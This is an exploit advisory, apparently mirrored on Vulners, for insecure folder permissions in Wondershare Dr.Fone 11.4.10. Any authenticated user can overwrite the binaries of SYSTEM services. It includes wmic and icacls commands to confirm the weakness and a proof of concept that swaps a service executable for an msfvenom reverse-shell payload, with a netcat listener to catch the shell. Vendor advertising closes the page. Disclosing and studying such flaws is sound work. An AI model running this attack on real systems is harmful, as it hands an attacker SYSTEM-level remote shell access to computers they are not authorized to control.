Vulners
Lucene search
Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions
# Date: 04/25/2022
# Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec)
# Vendor Homepage: https://drfone.wondershare.com/
# Software Link: https://download.wondershare.com/drfone_full3360.exe
# Version: 11.4.10
# Tested on: Windows 10 64-bit
# Note: The application folder "Wondershare Dr.Fone" may be different (e.g it will be "drfone" if we download the installer from the italian website)
# Description:
The application "Wondershare Dr. Fone" comes with 3 services:
1. DFWSIDService
2. ElevationService
3. Wondershare InstallAssist
All the folders that contain the binaries for the services have weak permissions.
These weak permissions allow any authenticated user to get SYSTEM privileges.
First, we need to check if services are running using the following command:
wmic service get name,displayname,pathname,startmode,startname,state | findstr /I wondershare
Wondershare WSID help DFWSIDService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\WsidService.exe Auto LocalSystem Running
Wondershare Driver Install Service help ElevationService C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps\ElevationService.exe Auto LocalSystem Running
Wondershare Install Assist Service Wondershare InstallAssist C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto LocalSystem Running
Now we need to check if we have enough privileges to replace the binaries:
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone"
Everyone:(OI)(CI)(F) <= the first row tells us that Everyone has Full Access (F) on files (OI = Object Inherit) and folders (CI = Container Inherit)
...
icacls "C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\Addins\SocialApps"
Everyone:(I)(OI)(CI)(F) <= same here
...
icacls "C:\ProgramData\Wondershare\Service"
Everyone:(I)(OI)(CI)(F) <= and here
...
# Proof of Concept:
1. Create an exe file with the name of the binary we want to replace (e.g. WsidService.exe if we want to exploit the service "Wondershare WSID help")
2. Put it in the folder (e.g. C:\Program Files (x86)\Wondershare\Wondershare Dr.Fone\)
3. After replacing the binary, wait the next reboot (unless the service can be restarted manually)
As a proof of concept we can generate a simple reverse shell using msfvenom, and use netcat as the listener:
simple payload: msfvenom --payload windows/shell_reverse_tcp LHOST=<YOUR_IP_ADDRESS> LPORT=<YOUR_PORT> -f exe > WsidService.exe
listener: nc -nlvp <YOUR_PORT>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 May 2022 00:00Current
7.4High risk
Vulners AI Score7.4